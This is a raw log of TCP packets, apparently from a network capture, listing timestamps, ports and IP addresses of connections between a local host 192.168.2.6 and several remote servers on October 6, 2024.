                                                                                                                            Oct 6, 2024 13:50:06.217668056 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.217775106 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.217829943 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.218075037 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.218163013 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.218574047 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.218630075 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.219054937 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.219115019 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.220750093 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.220817089 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.224967957 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.225029945 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.225285053 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.225292921 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.225722075 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.225722075 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.225734949 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.225815058 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.228281975 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.228465080 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.228703976 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.228820086 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.229909897 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.229978085 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.230171919 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.230180025 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.230211020 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.230222940 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.230247974 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.230263948 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.232892036 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.233230114 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.233237982 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.234644890 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.234704971 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.235354900 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.235444069 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.235579967 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.272842884 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.272865057 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.272866011 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.272874117 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.274718046 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.274934053 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.283406019 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.288844109 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.288851023 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.318357944 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.335726023 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.348236084 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.348330021 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.348409891 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.351388931 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.351404905 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.359172106 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.359272003 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.359319925 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.361263037 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.361387014 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.361443996 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.361495018 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.361505032 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.361534119 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.361574888 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.361625910 CEST49736443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.361702919 CEST44349736104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.361774921 CEST49736443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.362323999 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.362335920 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.362364054 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.362663031 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.362735987 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.362797022 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.362808943 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.362946033 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.362971067 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.363023043 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.363023996 CEST49736443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:06.363043070 CEST44349736104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.363804102 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.363861084 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.365230083 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.365299940 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.365350962 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.365376949 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.365400076 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.366648912 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.366656065 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.368668079 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.368678093 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.370615959 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.370628119 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.380122900 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.380125999 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.380137920 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.380207062 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.380316973 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.384970903 CEST49737443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.385004997 CEST4434973723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.385068893 CEST49737443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.385507107 CEST49737443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.385519028 CEST4434973723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.385935068 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.385941982 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.405636072 CEST49738443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.405653000 CEST4434973823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.405725002 CEST49738443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.407675028 CEST49738443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.407691956 CEST4434973823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.407881021 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.407892942 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.413589001 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.432022095 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.437026024 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.437093973 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.437655926 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.442531109 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.456907988 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.461816072 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.461894989 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.463124037 CEST4974080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.466662884 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.467147112 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.467156887 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.467756987 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.467772007 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.467849970 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.467856884 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.467881918 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.467905045 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.467968941 CEST8049740165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.467998028 CEST49741443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:06.468048096 CEST44349741104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.468115091 CEST49741443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:06.468353987 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.468770981 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.470294952 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.470381021 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.470658064 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.470674992 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.471030951 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.471040010 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.471349001 CEST49741443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:06.471370935 CEST44349741104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.471786022 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.471813917 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.471863031 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.471869946 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.471894979 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.471980095 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.472841024 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.473871946 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.473963022 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.474128008 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.474144936 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.506820917 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.506927967 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.506966114 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.506973028 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.506989002 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507026911 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.507035971 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507066011 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507101059 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.507106066 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507153988 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507186890 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.507193089 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507453918 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.507493973 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.507499933 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.509275913 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.509327888 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.511001110 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.511013031 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.514564037 CEST49742443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.514596939 CEST4434974223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.514707088 CEST49742443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.515413046 CEST49742443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.515434980 CEST4434974223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.523381948 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.523857117 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.531164885 CEST49743443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.531212091 CEST4434974323.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.531402111 CEST49743443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.531905890 CEST49743443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.531922102 CEST4434974323.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.559426069 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.559812069 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.559844971 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.561307907 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.561369896 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.563133001 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.563230038 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.563472033 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.563483000 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.616359949 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.621356964 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621431112 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621495008 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621527910 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621561050 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621570110 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.621570110 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.621592999 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621625900 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621658087 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621690035 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621699095 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.621699095 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.621737957 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621800900 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.621870995 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621943951 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.621978045 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622019053 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.622039080 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622077942 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622092009 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622103930 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622127056 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.622127056 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.622138977 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622173071 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622185946 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.622208118 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.622266054 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.626689911 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.626723051 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.626756907 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.626761913 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.627217054 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.627249956 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.627279997 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.627347946 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.627465010 CEST44349705173.222.162.64192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.627547979 CEST49705443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:50:06.627963066 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.629209042 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.629220009 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.629745960 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.629765987 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.629818916 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.629827023 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.629872084 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.629872084 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.630806923 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.631356001 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.631468058 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.631526947 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.640691042 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640758038 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640786886 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640808105 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.640849113 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640882969 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640892982 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.640914917 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640947104 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.640980959 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.641024113 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.641024113 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.654927969 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.658955097 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.659876108 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.660145998 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.660191059 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.660190105 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.660229921 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.660278082 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.660284996 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.660300970 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.660347939 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.660923958 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.661030054 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.661076069 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.661087036 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.665203094 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.665245056 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.665247917 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.665260077 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.665297031 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.674861908 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.679322004 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.679332018 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.679332018 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.679347992 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.708132982 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.724919081 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.725377083 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:06.748301983 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748404026 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748446941 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.748471022 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748564005 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748605967 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.748614073 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748702049 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748743057 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.748754025 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748797894 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.748836994 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.748847008 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.749443054 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.749485016 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.749486923 CEST49735443192.168.2.6151.101.194.137
